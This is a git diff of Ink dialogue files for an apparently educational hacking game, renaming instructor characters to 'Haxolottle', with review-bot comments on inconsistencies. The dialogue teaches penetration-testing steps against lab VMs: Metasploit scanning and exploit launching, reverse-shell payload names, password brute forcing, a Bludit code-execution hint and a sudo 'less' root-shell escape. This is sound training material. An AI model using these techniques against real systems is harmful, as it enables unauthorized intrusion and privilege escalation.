@@ -349,20 +349,20 @@ Crypto Instructor: Core concepts: key pairs (public and private), encryption, de // =========================================== === commands_reference === -Crypto Instructor: Quick reference for the commands we've covered: +Haxolottle: Quick reference for the commands we've covered: -Crypto Instructor: **Encoding:** +Haxolottle: **Encoding:** - Hex: `echo "text" | xxd -p` (encode), `echo "hex" | xxd -r -p` (decode) - Base64: `echo "text" | base64` (encode), `echo "b64" | base64 -d` (decode) - View as binary: `xxd -b file` -Crypto Instructor: **Symmetric Encryption (OpenSSL):** +Haxolottle: **Symmetric Encryption (OpenSSL):** - AES encrypt: `openssl enc -aes-256-cbc -pbkdf2 -in file -out file.enc` - AES decrypt: `openssl enc -aes-256-cbc -d -in file.enc -out file.txt` - DES encrypt: `openssl enc -des-cbc -pbkdf2 -in file -out file.enc` - List ciphers: `openssl list -cipher-algorithms` -Crypto Instructor: **Public Key Crypto (GPG):** +Haxolottle: **Public Key Crypto (GPG):** - Generate keys: `gpg --gen-key` - List keys: `gpg --list-keys` - Export public: `gpg --export -a "Name" > public.key` @@ -372,7 +372,7 @@ Crypto Instructor: **Public Key Crypto (GPG):** - Sign: `gpg -s file` - Verify: `gpg --verify file.gpg` -Crypto Instructor: **Useful OpenSSL:** +Haxolottle: **Useful OpenSSL:** - Hash: `openssl dgst -sha256 file` - Random data: `openssl rand -hex 32` - Version: `openssl version` 
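Review bot: the `Symmetric Encryption (OpenSSL)` list in the `@@ -349,20` hunk repeats the encrypt/decrypt mismatch: `AES encrypt` and `DES encrypt` pass `-pbkdf2` but `AES decrypt: openssl enc -aes-256-cbc -d -in file.enc -out file.txt` does not, so a learner following the reference card end to end gets `bad decrypt`; add `-pbkdf2` to the decrypt line, and add a DES decrypt entry to pair with the DES encrypt one.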
@@ -385,33 +385,33 @@ Crypto Instructor: **Useful OpenSSL:** // =========================================== === ready_for_practice === -Crypto Instructor: Excellent. You've covered the fundamentals. +Haxolottle: Excellent. You've covered the fundamentals. -Crypto Instructor: In your VM's home directory, you'll find CTF challenges testing these skills: +Haxolottle: In your VM's home directory, you'll find CTF challenges testing these skills: - Decoding various encoded data - Decrypting symmetrically-encrypted files - Using GPG for secure communication - Breaking weak encryption -Crypto Instructor: Practical tips: +Haxolottle: Practical tips: -Crypto Instructor: **Recognize encoding schemes on sight**: Base64 ends in =, hex is 0-9 and a-f, binary is only 0 and 1. +Haxolottle: **Recognize encoding schemes on sight**: Base64 ends in =, hex is 0-9 and a-f, binary is only 0 and 1. -Crypto Instructor: **Try obvious passwords first**: "password", "admin", "123456". Weak keys are common. +Haxolottle: **Try obvious passwords first**: "password", "admin", "123456". Weak keys are common. -Crypto Instructor: **Check file headers**: `file` command identifies file types even if extension is wrong. Encoded/encrypted data looks like random bytes. +Haxolottle: **Check file headers**: `file` command identifies file types even if extension is wrong. Encoded/encrypted data looks like random bytes. -Crypto Instructor: **Use CyberChef for quick analysis**: Web tool that chains encoding/decoding operations. Great for CTFs. +Haxolottle: **Use CyberChef for quick analysis**: Web tool that chains encoding/decoding operations. Great for CTFs. -Crypto Instructor: **Document what you try**: When attempting decryption, track what keys/methods you've tested. Easy to lose track. +Haxolottle: **Document what you try**: When attempting decryption, track what keys/methods you've tested. Easy to lose track. 
-{instructor_rapport >= 50: - Crypto Instructor: You've asked excellent questions and engaged deeply with the material. You're well-prepared. +{haxolottle_rapport >= 50: + Haxolottle: You've asked excellent questions and engaged deeply with the material. You're well-prepared. } -Crypto Instructor: Remember: encoding is reversible with no secret. Encryption requires keys. Symmetric uses same key for both. Asymmetric uses key pairs. +Haxolottle: Remember: encoding is reversible with no secret. Encryption requires keys. Symmetric uses same key for both. Asymmetric uses key pairs. -Crypto Instructor: Now go break some crypto challenges. Good luck, Agent {player_name}. +Haxolottle: Now go break some crypto challenges. Good luck, Agent {player_name}. #exit_conversation -> END diff --git a/story_design/ink/game_scenarios/exploitation.ink b/story_design/ink/game_scenarios/exploitation.ink index cf5056a..97de033 100644 --- a/story_design/ink/game_scenarios/exploitation.ink +++ b/story_design/ink/game_scenarios/exploitation.ink @@ -4,7 +4,7 @@ // License: CC BY-SA 4.0 // Global persistent state -VAR instructor_rapport = 0 +VAR haxolottle_rapport = 0 VAR exploitation_mastery = 0 // External variables @@ -13,7 +13,7 @@ EXTERNAL player_name === start === Exploitation Specialist: Welcome back, Agent {player_name}. I'm your instructor for Advanced Exploitation Techniques. -~ instructor_rapport = 0 +~ haxolottle_rapport = 0 ~ exploitation_mastery = 0 Exploitation Specialist: This lab brings together everything you've learned so far - scanning, vulnerability research, and exploitation. 
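Review bot: In the ready_for_practice hunk, the rewritten tip "Base64 ends in =" is only true when the input length is not a multiple of three bytes; many Base64 strings carry no padding at all. Suggest softening to "Base64 often ends in = padding and uses A-Z, a-z, 0-9, + and /" so players do not rule out Base64 just because a blob has no trailing =.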
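Review bot: In the exploitation.ink start hunk only the variable is renamed (`~ haxolottle_rapport = 0`) while the speaker label stays `Exploitation Specialist:` on every dialogue line of the file, which contradicts the commit message "All files now use consistent Haxolottle character". Either rename the speaker lines in this file the way encoding_encryption.ink and feeling_blu_ctf.ink were renamed, or drop exploitation.ink from the commit message's list of converted files.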
@@ -64,7 +64,7 @@ Exploitation Specialist: What aspect of exploitation would you like to explore? === scanning_to_exploitation === Exploitation Specialist: After gathering information about a target through footprinting and scanning, you need to know what attacks will work. -~ instructor_rapport += 5 +~ haxolottle_rapport += 5 Exploitation Specialist: The key questions are: Where will you find vulnerability information? How will you use that information to launch an attack? How can security professionals use this to test system security? @@ -77,7 +77,7 @@ Exploitation Specialist: Once you know the operating system and software running Exploitation Specialist: The scanning phase reveals what's running. The vulnerability research phase identifies what's vulnerable. The exploitation phase is when you actually attack. - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 + [How do I know what attacks will work?] Exploitation Specialist: This is where vulnerability databases and exploit frameworks like Metasploit come in. @@ -88,14 +88,14 @@ Exploitation Specialist: Once you know the operating system and software running Exploitation Specialist: We'll also look at external databases like CVE Details, NVD, and Exploit DB. - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 - -> exploitation_hub === nmap_scanning === Exploitation Specialist: The first step is thorough scanning to identify your targets and what they're running. -~ instructor_rapport += 5 +~ haxolottle_rapport += 5 Exploitation Specialist: For this lab, you'll scan your network to find two vulnerable servers - one Linux and one Windows. 
@@ -114,7 +114,7 @@ Exploitation Specialist: Where X.X are the second and third octets of your Kali Exploitation Specialist: Those specific version numbers are critical for finding applicable exploits. - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 + [What if the scan takes too long?] Exploitation Specialist: Windows scans can take several minutes to complete - this is normal. @@ -123,7 +123,7 @@ Exploitation Specialist: Where X.X are the second and third octets of your Kali Exploitation Specialist: However, for thorough penetration testing, patience is important. You don't want to miss a vulnerable service on an unusual port. - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 + [What if nmap shows ftp with a question mark?] Exploitation Specialist: If you see "ftp?" in the results, it means Nmap isn't confident about the service identification. @@ -132,14 +132,14 @@ Exploitation Specialist: Where X.X are the second and third octets of your Kali Exploitation Specialist: Try restarting the Windows server and scanning again. The service should respond properly after a fresh start. - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 - -> exploitation_hub === metasploit_database === Exploitation Specialist: Metasploit includes a PostgreSQL database that stores information about hosts, services, and vulnerabilities. -~ instructor_rapport += 5 +~ haxolottle_rapport += 5 Exploitation Specialist: This database integration is extremely powerful - it lets you import scan results and automatically target vulnerable services. @@ -154,7 +154,7 @@ Exploitation Specialist: Before using the database, you need to initialize it an Exploitation Specialist: You only need to do this once per session, or after restarting your Kali VM. - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 + [How do I import Nmap scan results?] Exploitation Specialist: If you've saved Nmap results in XML format, you can import them: 
@@ -165,7 +165,7 @@ Exploitation Specialist: Before using the database, you need to initialize it an Exploitation Specialist: You can then query this data with commands like "hosts" and "services" - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 + [What can I do with the database?] Exploitation Specialist: Once data is in the database, you can query it intelligently: @@ -180,14 +180,14 @@ Exploitation Specialist: Before using the database, you need to initialize it an Exploitation Specialist: This integration makes targeting much more efficient. - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 - -> exploitation_hub === msfconsole_scanning === Exploitation Specialist: You can run scans directly from within msfconsole - you don't always need a separate terminal. -~ instructor_rapport += 5 +~ haxolottle_rapport += 5 Exploitation Specialist: Msfconsole can run Bash commands, so you can run Nmap directly: msf > nmap -O -sV TARGET @@ -202,7 +202,7 @@ Exploitation Specialist: Even better, you can use db_nmap which scans AND automa Exploitation Specialist: This scans all ports with OS and version detection, and the results are immediately available via "hosts" and "services" - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 + [Does Metasploit have its own scanners?] Exploitation Specialist: Yes! Metasploit has various port scanning modules, though they're not as feature-complete as Nmap. @@ -213,7 +213,7 @@ Exploitation Specialist: Even better, you can use db_nmap which scans AND automa Exploitation Specialist: These modules integrate directly with the database and can use multiple threads for faster scanning. - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 + [How do I use Metasploit's port scanner?] Exploitation Specialist: First, select the module: use auxiliary/scanner/portscan/tcp 
@@ -226,14 +226,14 @@ Exploitation Specialist: Even better, you can use db_nmap which scans AND automa Exploitation Specialist: Results are automatically stored in the database. You can verify with the "services" command. - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 - -> exploitation_hub === searching_exploits === Exploitation Specialist: Metasploit's search command is incredibly powerful for finding relevant exploits. -~ instructor_rapport += 5 +~ haxolottle_rapport += 5 Exploitation Specialist: You can search by platform, service name, CVE number, exploit type, and more. @@ -256,7 +256,7 @@ Exploitation Specialist: But you can be much more specific with search operators Exploitation Specialist: Or: search type:exploit cve:2003-0352 - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 + [How do I search for specific software?] Exploitation Specialist: Simply include the software name in the search: @@ -271,7 +271,7 @@ Exploitation Specialist: But you can be much more specific with search operators Exploitation Specialist: Look through the results for modules that match your target's version number. - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 + [Give me some search examples] Exploitation Specialist: Sure! Here are useful searches: @@ -288,14 +288,14 @@ Exploitation Specialist: But you can be much more specific with search operators Exploitation Specialist: Once you find a promising module, use "info exploit/path/to/module" to learn more about it. - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 - -> exploitation_hub === launching_exploits === Exploitation Specialist: Once you've identified the right exploit module, launching it follows a standard workflow. -~ instructor_rapport += 5 +~ haxolottle_rapport += 5 Exploitation Specialist: The process is: select the module, configure options, choose a payload, and launch the attack. 
@@ -320,7 +320,7 @@ Exploitation Specialist: Let's walk through a typical exploitation scenario. Exploitation Specialist: If successful, you'll get a shell on the target! - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 + [What payloads should I use?] Exploitation Specialist: The payload depends on what you want to achieve and what the exploit supports. @@ -339,7 +339,7 @@ Exploitation Specialist: Let's walk through a typical exploitation scenario. Exploitation Specialist: linux/x86/meterpreter/reverse_tcp - Meterpreter for Linux - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 + [What if the exploit doesn't work?] Exploitation Specialist: First, run "show options" and verify all settings, especially IP addresses. @@ -352,7 +352,7 @@ Exploitation Specialist: Let's walk through a typical exploitation scenario. Exploitation Specialist: Some exploits are unreliable and may need multiple attempts. - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 + [What can I do once I have a shell?] Exploitation Specialist: With a Windows shell, you can run commands like: @@ -373,14 +373,14 @@ Exploitation Specialist: Let's walk through a typical exploitation scenario. Exploitation Specialist: We'll cover post-exploitation in more depth in later labs. - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 - -> exploitation_hub === armitage_intro === Exploitation Specialist: Armitage is a free and open source graphical interface for Metasploit with powerful automation features. -~ instructor_rapport += 5 +~ haxolottle_rapport += 5 Exploitation Specialist: It was created to make Metasploit more accessible and to automate repetitive tasks in penetration testing. 
@@ -397,7 +397,7 @@ Exploitation Specialist: Armitage can scan networks, automatically suggest attac Exploitation Specialist: However, experienced penetration testers often prefer msfconsole for its power and speed. - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 + [How do I start Armitage?] Exploitation Specialist: First, initialize the Metasploit database if you haven't already: @@ -414,7 +414,7 @@ Exploitation Specialist: Armitage can scan networks, automatically suggest attac Exploitation Specialist: If prompted, allow Armitage to start the Metasploit RPC server. - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 + [What does the Armitage interface show?] Exploitation Specialist: Armitage displays a visual network map showing discovered hosts. @@ -427,14 +427,14 @@ Exploitation Specialist: Armitage can scan networks, automatically suggest attac Exploitation Specialist: The interface makes it easy to see the big picture of a network and what you've compromised. - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 - -> exploitation_hub === armitage_usage === Exploitation Specialist: Let me walk you through using Armitage to scan and exploit targets. -~ instructor_rapport += 5 +~ haxolottle_rapport += 5 Exploitation Specialist: Armitage integrates scanning, vulnerability analysis, and exploitation into a streamlined workflow. @@ -449,7 +449,7 @@ Exploitation Specialist: Armitage integrates scanning, vulnerability analysis, a Exploitation Specialist: Any previously scanned hosts in the database will also appear automatically. - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 + [How does Armitage suggest attacks?] Exploitation Specialist: Armitage analyzes the operating system and services detected on each host. 
@@ -462,7 +462,7 @@ Exploitation Specialist: Armitage integrates scanning, vulnerability analysis, a Exploitation Specialist: Right-click a host and select "Attack" to see suggested exploits categorized by service. - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 + [How do I launch an attack in Armitage?] Exploitation Specialist: Right-click the target host and select "Attack" @@ -475,7 +475,7 @@ Exploitation Specialist: Armitage integrates scanning, vulnerability analysis, a Exploitation Specialist: You can then right-click the compromised host to interact with shells or run post-exploitation modules. - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 + [How do I interact with a compromised system?] Exploitation Specialist: Right-click the compromised (red) host. @@ -488,14 +488,14 @@ Exploitation Specialist: Armitage integrates scanning, vulnerability analysis, a Exploitation Specialist: Armitage also has menu options for common post-exploitation tasks. - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 - -> exploitation_hub === vulnerability_databases === Exploitation Specialist: Beyond Metasploit, there are numerous online vulnerability databases you should know about. -~ instructor_rapport += 5 +~ haxolottle_rapport += 5 Exploitation Specialist: These databases provide detailed information about known vulnerabilities, even if exploits aren't publicly available. @@ -512,7 +512,7 @@ Exploitation Specialist: Different databases have different focuses and informat Exploitation Specialist: Packet Storm Security (packetstormsecurity.com) - Security tools, exploits, and advisories. - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 + [What information do these databases provide?] Exploitation Specialist: Vulnerability databases typically include: 
@@ -529,7 +529,7 @@ Exploitation Specialist: Different databases have different focuses and informat Exploitation Specialist: Information about whether exploits exist in the wild. - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 + [Do all vulnerabilities have CVEs?] Exploitation Specialist: No! This is an important point. @@ -544,14 +544,14 @@ Exploitation Specialist: Different databases have different focuses and informat Exploitation Specialist: This is why checking multiple sources and forums is important. - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 - -> exploitation_hub === exploit_db === Exploitation Specialist: The Exploit Database (Exploit-DB) is an extensive database focused on vulnerabilities with working exploits. -~ instructor_rapport += 5 +~ haxolottle_rapport += 5 Exploitation Specialist: It's maintained by Offensive Security (the makers of Kali Linux) and contains thousands of exploits with source code. @@ -566,7 +566,7 @@ Exploitation Specialist: Kali Linux includes a local copy of the entire database Exploitation Specialist: The database also categorizes exploits by type: remote, local, web application, DoS, etc. - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 + [How do I use the local Exploit-DB copy?] Exploitation Specialist: On Kali Linux, exploits are stored in /usr/share/exploitdb/ @@ -577,7 +577,7 @@ Exploitation Specialist: Kali Linux includes a local copy of the entire database Exploitation Specialist: There's also an index file with descriptions: less /usr/share/exploitdb/files_exploits.csv - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 + [What's searchsploit?] Exploitation Specialist: Searchsploit is a command-line tool for searching the local Exploit-DB copy. 
@@ -590,7 +590,7 @@ Exploitation Specialist: Kali Linux includes a local copy of the entire database Exploitation Specialist: To download an exploit to your current directory: searchsploit -m windows/remote/11539.py - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 + [How do I use standalone exploits from Exploit-DB?] Exploitation Specialist: Standalone exploits often require some manual setup: @@ -605,14 +605,14 @@ Exploitation Specialist: Kali Linux includes a local copy of the entire database Exploitation Specialist: Always understand what an exploit does before running it! - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 - -> exploitation_hub === commands_reference === Exploitation Specialist: Let me provide a comprehensive commands reference for this lab. -~ instructor_rapport += 5 +~ haxolottle_rapport += 5 Exploitation Specialist: **Initial Scanning:** @@ -647,7 +647,7 @@ Exploitation Specialist: msfconsole (start Metasploit console) Exploitation Specialist: msf > services -p 21 -R (and set RHOSTS) - ~ instructor_rapport += 3 + ~ haxolottle_rapport += 3 + [Show me Metasploit scanning modules] Exploitation Specialist: **Metasploit Port Scanners:** @@ -666,7 +666,7 @@ Exploitation Specialist: msfconsole (start Metasploit console) Exploitation Specialist: msf auxiliary(tcp) > back - ~ instructor_rapport += 3 + ~ haxolottle_rapport += 3 + [Show me searching for exploits] Exploitation Specialist: **Searching for Exploits:** @@ -685,7 +685,7 @@ Exploitation Specialist: msfconsole (start Metasploit console) Exploitation Specialist: msf > info exploit/windows/ftp/easyftp_cwd_fixret - ~ instructor_rapport += 3 + ~ haxolottle_rapport += 3 + [Show me launching exploits] Exploitation Specialist: **Launching Exploits:** 
@@ -706,7 +706,7 @@ Exploitation Specialist: msfconsole (start Metasploit console) Exploitation Specialist: msf exploit(...) > exploit - ~ instructor_rapport += 3 + ~ haxolottle_rapport += 3 + [Show me post-exploitation commands] Exploitation Specialist: **Post-Exploitation Commands (Windows):** @@ -729,7 +729,7 @@ Exploitation Specialist: msfconsole (start Metasploit console) Exploitation Specialist: cat flag (read flag file) - ~ instructor_rapport += 3 + ~ haxolottle_rapport += 3 + [Show me Armitage commands] Exploitation Specialist: **Armitage Setup:** @@ -752,7 +752,7 @@ Exploitation Specialist: msfconsole (start Metasploit console) Exploitation Specialist: 5. Right-click compromised host → Interact → Command shell - ~ instructor_rapport += 3 + ~ haxolottle_rapport += 3 + [Show me Exploit-DB commands] Exploitation Specialist: **Exploit Database:** @@ -767,14 +767,14 @@ Exploitation Specialist: msfconsole (start Metasploit console) Exploitation Specialist: searchsploit -m windows/remote/11539.py - ~ instructor_rapport += 3 + ~ haxolottle_rapport += 3 - -> exploitation_hub === challenge_tips === Exploitation Specialist: Let me give you practical tips for succeeding in the exploitation challenges. -~ instructor_rapport += 5 +~ haxolottle_rapport += 5 Exploitation Specialist: **Finding Vulnerable Services:** @@ -797,7 +797,7 @@ Exploitation Specialist: Import results into Metasploit for easier targeting: db Exploitation Specialist: If the exploit fails, restart the Windows VM and try again. - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 + [Tips for exploiting the Linux server?] Exploitation Specialist: The Linux server has multiple potentially vulnerable services. 
@@ -812,7 +812,7 @@ Exploitation Specialist: Import results into Metasploit for easier targeting: db Exploitation Specialist: Some Linux exploits are more reliable than others - you may need to try a few. - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 + [Tips for using Armitage?] Exploitation Specialist: Armitage is great for beginners because it suggests attacks automatically. @@ -825,7 +825,7 @@ Exploitation Specialist: Import results into Metasploit for easier targeting: db Exploitation Specialist: If Armitage seems to hang, check the console tab at the bottom for error messages. - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 + [General troubleshooting advice?] Exploitation Specialist: Always verify your IP addresses with "show options" before running exploits. @@ -838,7 +838,7 @@ Exploitation Specialist: Import results into Metasploit for easier targeting: db Exploitation Specialist: Be patient - some exploits take time to establish connections. - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 + [Where are the flags?] Exploitation Specialist: For the Windows server, look on a user's Desktop. @@ -857,14 +857,14 @@ Exploitation Specialist: Import results into Metasploit for easier targeting: db Exploitation Specialist: Read flags with: cat flag - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 - -> exploitation_hub === ready_for_practice === Exploitation Specialist: Excellent! You're ready to start practical exploitation. -~ instructor_rapport += 10 +~ haxolottle_rapport += 10 ~ exploitation_mastery += 10 Exploitation Specialist: You now understand how to move from scanning to exploitation - the core of penetration testing. @@ -886,7 +886,7 @@ Exploitation Specialist: In this lab, you'll scan two servers, identify vulnerab Exploitation Specialist: Good luck, Agent {player_name}. Time to put your skills to the test. - ~ instructor_rapport += 10 + ~ haxolottle_rapport += 10 - -> exploitation_hub 
diff --git a/story_design/ink/game_scenarios/feeling_blu_ctf.ink b/story_design/ink/game_scenarios/feeling_blu_ctf.ink index 64cb9bd..bce20f1 100644 --- a/story_design/ink/game_scenarios/feeling_blu_ctf.ink +++ b/story_design/ink/game_scenarios/feeling_blu_ctf.ink 
@@ -12,61 +12,61 @@ VAR challenge_mode = "guided" // "guided" or "ctf" EXTERNAL player_name === start === -CTF Challenge Coordinator: Welcome, Agent {player_name}. I'm your coordinator for the "Feeling Blu" CTF Challenge. +Haxolottle: Welcome, Agent {player_name}. I'm your coordinator for the "Feeling Blu" CTF Challenge. ~ instructor_rapport = 0 ~ ctf_mastery = 0 -CTF Challenge Coordinator: This is your final test - a comprehensive Capture The Flag challenge that brings together everything you've learned. +Haxolottle: This is your final test - a comprehensive Capture The Flag challenge that brings together everything you've learned. -CTF Challenge Coordinator: You'll exploit a web server, gain access, escalate privileges, and hunt for flags. This simulates a real-world penetration test from start to finish. +Haxolottle: You'll exploit a web server, gain access, escalate privileges, and hunt for flags. This simulates a real-world penetration test from start to finish. -CTF Challenge Coordinator: Before we begin, you need to choose how you want to approach this challenge. +Haxolottle: Before we begin, you need to choose how you want to approach this challenge. -> choose_path === choose_path === -CTF Challenge Coordinator: How do you want to tackle this CTF challenge? +Haxolottle: How do you want to tackle this CTF challenge? + [Pure CTF mode - minimal guidance, maximum challenge] ~ challenge_mode = "ctf" - CTF Challenge Coordinator: Excellent choice! You'll get the full Capture The Flag experience. + Haxolottle: Excellent choice! You'll get the full Capture The Flag experience. - CTF Challenge Coordinator: I'll give you the tools and objectives, but you'll need to figure out the approach yourself. + Haxolottle: I'll give you the tools and objectives, but you'll need to figure out the approach yourself. - CTF Challenge Coordinator: Use everything you've learned: scanning, exploitation, privilege escalation, and persistence. 
+ Haxolottle: Use everything you've learned: scanning, exploitation, privilege escalation, and persistence. - CTF Challenge Coordinator: Only come back for hints if you're truly stuck. Good luck! + Haxolottle: Only come back for hints if you're truly stuck. Good luck! ~ ctf_mastery += 20 -> ctf_mode_hub + [Guided mode - walk me through the techniques] ~ challenge_mode = "guided" - CTF Challenge Coordinator: A wise choice for learning! I'll guide you through each phase with explanations. + Haxolottle: A wise choice for learning! I'll guide you through each phase with explanations. - CTF Challenge Coordinator: You'll learn web application exploitation, brute forcing, post-exploitation, and privilege escalation with structured guidance. + Haxolottle: You'll learn web application exploitation, brute forcing, post-exploitation, and privilege escalation with structured guidance. - CTF Challenge Coordinator: This approach ensures you understand not just how to exploit, but why each technique works. + Haxolottle: This approach ensures you understand not just how to exploit, but why each technique works. ~ instructor_rapport += 10 -> guided_mode_hub === ctf_mode_hub === -CTF Challenge Coordinator: This is CTF mode - you're on your own! Here's what I can tell you: +Haxolottle: This is CTF mode - you're on your own! Here's what I can tell you: -CTF Challenge Coordinator: Target: A web server running on your victim VM. +Haxolottle: Target: A web server running on your victim VM. -CTF Challenge Coordinator: Objectives: Find multiple flags, gain shell access, escalate to root. +Haxolottle: Objectives: Find multiple flags, gain shell access, escalate to root. -CTF Challenge Coordinator: Tools available: Nmap, Dirb, Nikto, Metasploit, OWASP ZAP, and more. +Haxolottle: Tools available: Nmap, Dirb, Nikto, Metasploit, OWASP ZAP, and more. + [What tools should I start with?] 
- CTF Challenge Coordinator: Think about the attack methodology: reconnaissance, scanning, exploitation, post-exploitation, privilege escalation. + Haxolottle: Think about the attack methodology: reconnaissance, scanning, exploitation, post-exploitation, privilege escalation. - CTF Challenge Coordinator: Start by discovering what's running: Nmap for services, Dirb and Nikto for web enumeration. + Haxolottle: Start by discovering what's running: Nmap for services, Dirb and Nikto for web enumeration. - CTF Challenge Coordinator: Look for hidden files, admin panels, and leaked credentials. + Haxolottle: Look for hidden files, admin panels, and leaked credentials. ~ instructor_rapport += 5 
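Review bot: In the feeling_blu_ctf.ink start hunk the speaker becomes Haxolottle but the state variable is left as `~ instructor_rapport = 0` and `~ instructor_rapport += 10`, whereas encoding_encryption.ink and exploitation.ink rename the same counter to `haxolottle_rapport` in this commit. If the rapport counter is meant to be shared persistent state across scenarios the names must agree; rename the remaining `instructor_rapport` references in this file so the files stay consistent.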
@@ -93,63 +93,63 @@ CTF Challenge Coordinator: Tools available: Nmap, Dirb, Nikto, Metasploit, OWASP -> END === ctf_recon_hints === -CTF Challenge Coordinator: Alright, here's a hint for reconnaissance: +Haxolottle: Alright, here's a hint for reconnaissance: -CTF Challenge Coordinator: Start with Nmap to identify services and versions: nmap -sV TARGET_IP +Haxolottle: Start with Nmap to identify services and versions: nmap -sV TARGET_IP -CTF Challenge Coordinator: Use Dirb to find hidden directories: dirb http://TARGET_IP +Haxolottle: Use Dirb to find hidden directories: dirb http://TARGET_IP -CTF Challenge Coordinator: Use Nikto for web vulnerabilities: nikto -h http://TARGET_IP +Haxolottle: Use Nikto for web vulnerabilities: nikto -h http://TARGET_IP -CTF Challenge Coordinator: Look carefully at discovered files - some contain very useful information about usernames and passwords! +Haxolottle: Look carefully at discovered files - some contain very useful information about usernames and passwords! -CTF Challenge Coordinator: The CMS being used might have known exploits. Identify what CMS is running. +Haxolottle: The CMS being used might have known exploits. Identify what CMS is running. ~ instructor_rapport += 5 -> ctf_mode_hub === ctf_exploit_hints === -CTF Challenge Coordinator: Here's a hint for exploitation: +Haxolottle: Here's a hint for exploitation: -CTF Challenge Coordinator: You should have discovered Bludit CMS running on the server. +Haxolottle: You should have discovered Bludit CMS running on the server. -CTF Challenge Coordinator: Search Metasploit for Bludit exploits: search bludit +Haxolottle: Search Metasploit for Bludit exploits: search bludit -CTF Challenge Coordinator: You'll need both a username and password - these might have been leaked in hidden files. +Haxolottle: You'll need both a username and password - these might have been leaked in hidden files. 
-CTF Challenge Coordinator: If you only have the username, consider brute-forcing the password using OWASP ZAP. +Haxolottle: If you only have the username, consider brute-forcing the password using OWASP ZAP. -CTF Challenge Coordinator: The Bludit vulnerability allows arbitrary code execution and should give you a Meterpreter shell. +Haxolottle: The Bludit vulnerability allows arbitrary code execution and should give you a Meterpreter shell. ~ instructor_rapport += 5 -> ctf_mode_hub === ctf_privesc_hints === -CTF Challenge Coordinator: Here's a hint for privilege escalation: +Haxolottle: Here's a hint for privilege escalation: -CTF Challenge Coordinator: After gaining initial access, check what sudo commands your user can run: sudo -l +Haxolottle: After gaining initial access, check what sudo commands your user can run: sudo -l -CTF Challenge Coordinator: If your user can run certain commands with sudo, look for ways to escape from those commands to get a root shell. +Haxolottle: If your user can run certain commands with sudo, look for ways to escape from those commands to get a root shell. -CTF Challenge Coordinator: The 'less' command is particularly interesting - it can execute shell commands with ! +Haxolottle: The 'less' command is particularly interesting - it can execute shell commands with ! -CTF Challenge Coordinator: If you can run 'less' with sudo, you can escape to a root shell! +Haxolottle: If you can run 'less' with sudo, you can escape to a root shell! ~ instructor_rapport += 5 -> ctf_mode_hub === switch_to_guided === -CTF Challenge Coordinator: Switching to guided mode. I'll walk you through the complete solution. +Haxolottle: Switching to guided mode. I'll walk you through the complete solution. ~ challenge_mode = "guided" -> guided_mode_hub === guided_mode_hub === -CTF Challenge Coordinator: Welcome to guided mode. I'll walk you through each phase of the challenge. +Haxolottle: Welcome to guided mode. 
I'll walk you through each phase of the challenge. + [Part 1: Information gathering and reconnaissance] -> phase_1_recon 
@@ -181,417 +181,417 @@ CTF Challenge Coordinator: Welcome to guided mode. I'll walk you through each ph -> END === web_tools_intro === -CTF Challenge Coordinator: Let me introduce the key web security tools you'll need. +Haxolottle: Let me introduce the key web security tools you'll need. ~ instructor_rapport += 5 -CTF Challenge Coordinator: **Dirb** is a web content scanner that finds hidden files and directories using dictionary attacks. +Haxolottle: **Dirb** is a web content scanner that finds hidden files and directories using dictionary attacks. -CTF Challenge Coordinator: **Nikto** is a web vulnerability scanner that checks for dangerous files, outdated software, and misconfigurations. +Haxolottle: **Nikto** is a web vulnerability scanner that checks for dangerous files, outdated software, and misconfigurations. -CTF Challenge Coordinator: **OWASP ZAP** is an intercepting proxy that lets you capture, modify, and replay HTTP requests - perfect for brute forcing. +Haxolottle: **OWASP ZAP** is an intercepting proxy that lets you capture, modify, and replay HTTP requests - perfect for brute forcing. + [How do I use Dirb?] - CTF Challenge Coordinator: Dirb is straightforward: dirb http://TARGET_IP + Haxolottle: Dirb is straightforward: dirb http://TARGET_IP - CTF Challenge Coordinator: It uses a built-in dictionary to test common paths like /admin/, /backup/, /config/, etc. + Haxolottle: It uses a built-in dictionary to test common paths like /admin/, /backup/, /config/, etc. - CTF Challenge Coordinator: Pay attention to discovered files - they often contain credentials or sensitive configuration data. + Haxolottle: Pay attention to discovered files - they often contain credentials or sensitive configuration data. - CTF Challenge Coordinator: Right-click discovered URLs to open them in your browser and examine their contents. + Haxolottle: Right-click discovered URLs to open them in your browser and examine their contents. 
